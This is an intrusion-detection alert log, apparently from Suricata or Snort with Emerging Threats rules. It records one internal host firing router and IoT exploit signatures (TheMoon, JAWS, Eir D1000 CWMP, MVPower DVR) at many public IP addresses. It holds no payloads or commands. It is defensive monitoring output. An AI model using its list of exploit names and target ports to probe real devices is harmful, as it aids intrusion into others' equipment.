ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.84.249

Timestamp:	03/18/24-09:59:32.108842
SID:	2018132
Source Port:	50728
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 194.40.247.73

Timestamp:	03/18/24-09:59:00.092020
SID:	2030092
Source Port:	54872
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 175.247.127.149

Timestamp:	03/18/24-09:59:10.244679
SID:	2023548
Source Port:	55378
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.189.233.57

Timestamp:	03/18/24-09:58:36.864668
SID:	2018132
Source Port:	55808
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 69.61.68.39

Timestamp:	03/18/24-09:59:19.059925
SID:	2025576
Source Port:	46772
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.173.248.59

Timestamp:	03/18/24-09:57:01.132078
SID:	2018132
Source Port:	54920
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.115.99.172

Timestamp:	03/18/24-09:59:36.295303
SID:	2023548
Source Port:	57190
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 146.56.247.60

Timestamp:	03/18/24-09:59:42.441125
SID:	2025576
Source Port:	58118
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.219.40.85

Timestamp:	03/18/24-09:57:00.463211
SID:	2025576
Source Port:	42894
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.85.144.61

Timestamp:	03/18/24-09:57:00.758496
SID:	2023548
Source Port:	41820
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.220.13.93

Timestamp:	03/18/24-09:59:49.634714
SID:	2023548
Source Port:	48796
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 116.89.2.122

Timestamp:	03/18/24-09:59:14.721609
SID:	2023548
Source Port:	51372
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.42.206

Timestamp:	03/18/24-10:00:06.885593
SID:	2018132
Source Port:	52558
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 172.66.202.115

Timestamp:	03/18/24-09:59:28.914166
SID:	2025576
Source Port:	37796
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 154.204.164.112

Timestamp:	03/18/24-09:59:15.523241
SID:	2025883
Source Port:	54334
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 98.220.109.225

Timestamp:	03/18/24-09:59:19.294348
SID:	2018132
Source Port:	46014
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 154.38.85.7

Timestamp:	03/18/24-10:00:14.909747
SID:	2030092
Source Port:	48206
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 222.104.180.25

Timestamp:	03/18/24-09:59:15.850869
SID:	2023548
Source Port:	54294
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 211.227.106.13

Timestamp:	03/18/24-09:58:47.321541
SID:	2025883
Source Port:	49062
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 50.35.135.158

Timestamp:	03/18/24-09:59:36.800503
SID:	2023548
Source Port:	47432
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.19.169.26

Timestamp:	03/18/24-09:58:51.796237
SID:	2025883
Source Port:	37562
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 206.189.8.131

Timestamp:	03/18/24-09:59:24.710785
SID:	2025883
Source Port:	49050
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.203.178.14

Timestamp:	03/18/24-09:59:10.286769
SID:	2023548
Source Port:	41270
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 179.155.26.219

Timestamp:	03/18/24-09:57:03.877251
SID:	2023548
Source Port:	45092
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 92.63.62.74

Timestamp:	03/18/24-09:58:28.725923
SID:	2025576
Source Port:	48490
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.66.200.221

Timestamp:	03/18/24-09:57:05.346180
SID:	2018132
Source Port:	35648
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 71.212.69.155

Timestamp:	03/18/24-09:58:21.328723
SID:	2023548
Source Port:	53148
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 2.19.201.24

Timestamp:	03/18/24-09:57:01.271172
SID:	2030092
Source Port:	52506
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 107.154.245.236

Timestamp:	03/18/24-09:59:14.452653
SID:	2023548
Source Port:	43888
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 14.46.12.61

Timestamp:	03/18/24-09:59:10.100825
SID:	2025883
Source Port:	49108
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 71.76.2.147

Timestamp:	03/18/24-10:00:15.476849
SID:	2023548
Source Port:	44210
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 175.178.211.161

Timestamp:	03/18/24-09:59:06.306578
SID:	2025883
Source Port:	55752
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 34.128.160.113

Timestamp:	03/18/24-09:59:02.617326
SID:	2023548
Source Port:	36962
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 184.99.43.131

Timestamp:	03/18/24-09:58:50.157595
SID:	2023548
Source Port:	39894
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 68.114.230.38

Timestamp:	03/18/24-09:57:07.859639
SID:	2023548
Source Port:	40948
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 162.159.160.82

Timestamp:	03/18/24-09:59:13.782207
SID:	2025576
Source Port:	43930
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 23.50.64.167

Timestamp:	03/18/24-09:59:34.761457
SID:	2025576
Source Port:	35710
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.162.12.221

Timestamp:	03/18/24-09:58:22.327838
SID:	2023548
Source Port:	34714
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 5.103.44.190

Timestamp:	03/18/24-09:58:36.262126
SID:	2025576
Source Port:	50558
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.142.61

Timestamp:	03/18/24-09:59:56.818308
SID:	2018132
Source Port:	59556
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.48.153

Timestamp:	03/18/24-09:59:43.596514
SID:	2018132
Source Port:	55874
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.44.221.162

Timestamp:	03/18/24-10:00:02.810743
SID:	2025883
Source Port:	46628
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 121.187.189.53

Timestamp:	03/18/24-10:00:16.201679
SID:	2023548
Source Port:	46474
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 119.197.148.29

Timestamp:	03/18/24-09:58:11.989811
SID:	2030092
Source Port:	57886
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 104.27.23.103

Timestamp:	03/18/24-09:58:29.962111
SID:	2025883
Source Port:	38420
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 125.158.173.31

Timestamp:	03/18/24-09:59:24.443426
SID:	2023548
Source Port:	53382
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 146.190.138.31

Timestamp:	03/18/24-09:58:33.473987
SID:	2030092
Source Port:	41280
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 142.197.229.125

Timestamp:	03/18/24-09:56:59.920067
SID:	2030092
Source Port:	52370
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 97.115.152.35

Timestamp:	03/18/24-09:59:31.656156
SID:	2023548
Source Port:	39132
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 203.94.213.104

Timestamp:	03/18/24-10:00:24.081860
SID:	2025576
Source Port:	49242
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.242.210.107

Timestamp:	03/18/24-09:59:02.300237
SID:	2023548
Source Port:	54314
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 197.165.225.76

Timestamp:	03/18/24-09:59:13.836477
SID:	2025883
Source Port:	47474
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.61.6.49

Timestamp:	03/18/24-09:59:21.978325
SID:	2023548
Source Port:	60538
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 193.105.29.92

Timestamp:	03/18/24-09:59:25.910371
SID:	2025883
Source Port:	58542
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 189.110.250.248

Timestamp:	03/18/24-09:58:43.538909
SID:	2023548
Source Port:	59290
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 139.59.132.218

Timestamp:	03/18/24-09:59:14.251412
SID:	2025576
Source Port:	55296
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 14.60.45.123

Timestamp:	03/18/24-09:58:15.769951
SID:	2023548
Source Port:	44510
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 2.17.196.113

Timestamp:	03/18/24-09:59:58.193118
SID:	2025883
Source Port:	57128
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 130.255.218.62

Timestamp:	03/18/24-10:00:03.626600
SID:	2023548
Source Port:	49758
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 52.76.109.138

Timestamp:	03/18/24-09:58:51.537631
SID:	2025883
Source Port:	56932
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 172.252.27.60

Timestamp:	03/18/24-09:59:05.586859
SID:	2025883
Source Port:	37332
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.232.15.32

Timestamp:	03/18/24-09:59:03.235208
SID:	2018132
Source Port:	47780
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 188.186.89.81

Timestamp:	03/18/24-09:59:26.421122
SID:	2023548
Source Port:	49334
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 47.203.5.227

Timestamp:	03/18/24-09:58:35.065187
SID:	2023548
Source Port:	57492
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.29.246.133

Timestamp:	03/18/24-10:00:02.886577
SID:	2030092
Source Port:	52854
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 71.45.48.26

Timestamp:	03/18/24-09:59:05.573844
SID:	2025883
Source Port:	36694
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 172.90.168.5

Timestamp:	03/18/24-09:57:00.535659
SID:	2023548
Source Port:	33618
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 153.122.77.114

Timestamp:	03/18/24-10:00:11.840503
SID:	2025576
Source Port:	58042
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.64.198.250

Timestamp:	03/18/24-09:58:27.963484
SID:	2018132
Source Port:	57866
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 123.240.201.73

Timestamp:	03/18/24-09:58:29.987838
SID:	2025883
Source Port:	39348
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 31.207.172.189

Timestamp:	03/18/24-10:00:00.688562
SID:	2023548
Source Port:	58598
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.46.45.13

Timestamp:	03/18/24-09:59:26.025707
SID:	2025883
Source Port:	44814
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 54.79.168.53

Timestamp:	03/18/24-09:59:25.416132
SID:	2025576
Source Port:	35612
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 142.171.28.226

Timestamp:	03/18/24-10:00:16.246803
SID:	2025576
Source Port:	41236
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 137.59.148.71

Timestamp:	03/18/24-09:59:18.928776
SID:	2025576
Source Port:	59210
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 184.24.157.185

Timestamp:	03/18/24-09:59:42.384728
SID:	2025576
Source Port:	58030
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 38.170.128.171

Timestamp:	03/18/24-09:59:05.698934
SID:	2025576
Source Port:	56866
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.231.196

Timestamp:	03/18/24-09:58:13.406514
SID:	2018132
Source Port:	53972
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 184.30.178.74

Timestamp:	03/18/24-09:58:15.592566
SID:	2025576
Source Port:	49100
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 182.40.54.228

Timestamp:	03/18/24-09:59:14.373739
SID:	2025576
Source Port:	50250
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 201.7.167.228

Timestamp:	03/18/24-10:00:23.168279
SID:	2025576
Source Port:	57346
Destination Port:	8080
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 38.57.128.187

Timestamp:	03/18/24-09:57:06.219519
SID:	2030092
Source Port:	43714
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.67.96.211

Timestamp:	03/18/24-09:59:42.510051
SID:	2018132
Source Port:	54460
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 148.72.72.45

Timestamp:	03/18/24-09:57:05.760880
SID:	2025883
Source Port:	33696
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 23.12.126.72

Timestamp:	03/18/24-09:59:57.047404
SID:	2030092
Source Port:	35154
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 13.234.237.150

Timestamp:	03/18/24-09:59:44.064430
SID:	2030092
Source Port:	35278
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 46.250.231.216

Timestamp:	03/18/24-09:59:52.334147
SID:	2030092
Source Port:	56004
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 64.23.148.185

Timestamp:	03/18/24-09:59:46.285613
SID:	2030092
Source Port:	59070
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 70.123.135.226

Timestamp:	03/18/24-09:58:34.197966
SID:	2023548
Source Port:	53426
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 74.131.43.223

Timestamp:	03/18/24-09:58:41.003880
SID:	2023548
Source Port:	44866
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 177.199.66.232

Timestamp:	03/18/24-09:58:41.015968
SID:	2023548
Source Port:	40684
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 150.60.145.188

Timestamp:	03/18/24-09:59:40.044089
SID:	2025576
Source Port:	36958
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 121.183.246.210

Timestamp:	03/18/24-09:59:41.048434
SID:	2025883
Source Port:	48018
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 104.232.109.40

Timestamp:	03/18/24-09:58:30.032851
SID:	2030092
Source Port:	39308
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.160.12

Timestamp:	03/18/24-09:58:36.792904
SID:	2018132
Source Port:	51022
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 183.115.74.170

Timestamp:	03/18/24-10:00:02.151548
SID:	2023548
Source Port:	42358
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.238.148.30

Timestamp:	03/18/24-09:58:17.938253
SID:	2023548
Source Port:	60308
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.192.181.204

Timestamp:	03/18/24-09:57:05.948763
SID:	2025883
Source Port:	42270
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.3.76.41

Timestamp:	03/18/24-09:59:54.415356
SID:	2025883
Source Port:	55280
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 119.199.233.112

Timestamp:	03/18/24-10:00:21.623367
SID:	2023548
Source Port:	58346
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 58.60.63.22

Timestamp:	03/18/24-09:59:05.935591
SID:	2025576
Source Port:	47436
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 193.33.133.175

Timestamp:	03/18/24-09:58:43.306627
SID:	2030092
Source Port:	53998
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 52.70.42.188

Timestamp:	03/18/24-10:00:10.894651
SID:	2030092
Source Port:	33374
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 176.215.149.76

Timestamp:	03/18/24-09:59:21.025199
SID:	2023548
Source Port:	55856
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 83.143.132.22

Timestamp:	03/18/24-09:57:00.375328
SID:	2030092
Source Port:	48016
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 18.155.237.42

Timestamp:	03/18/24-09:59:35.026872
SID:	2025576
Source Port:	56678
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT MVPower DVR Shell UCE - Source IP: 192.168.2.23 - Destination IP: 23.73.18.248

Timestamp:	03/18/24-09:59:54.588404
SID:	2025883
Source Port:	40234
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 99.238.90.225

Timestamp:	03/18/24-10:00:16.162857
SID:	2023548
Source Port:	44042
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE - Source IP: 192.168.2.23 - Destination IP: 201.224.131.137

Timestamp:	03/18/24-09:59:00.607985
SID:	2023548
Source Port:	41882
Destination Port:	7547
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution - Source IP: 192.168.2.23 - Destination IP: 89.161.147.139

Timestamp:	03/18/24-09:59:54.170365
SID:	2030092
Source Port:	50724
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ET WORM TheMoon.linksys.router 2 - Source IP: 192.168.2.23 - Destination IP: 172.65.64.6

Timestamp:	03/18/24-10:00:18.505831
SID:	2018132
Source Port:	42064
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT HackingTrio UA (Hello, World) - Source IP: 192.168.2.23 - Destination IP: 54.236.113.77

Timestamp:	03/18/24-09:58:43.743384
SID:	2025576
Source Port:	37718
Destination Port:	80
Protocol:	TCP
Classtype:	Attempted Administrator Privilege Gain

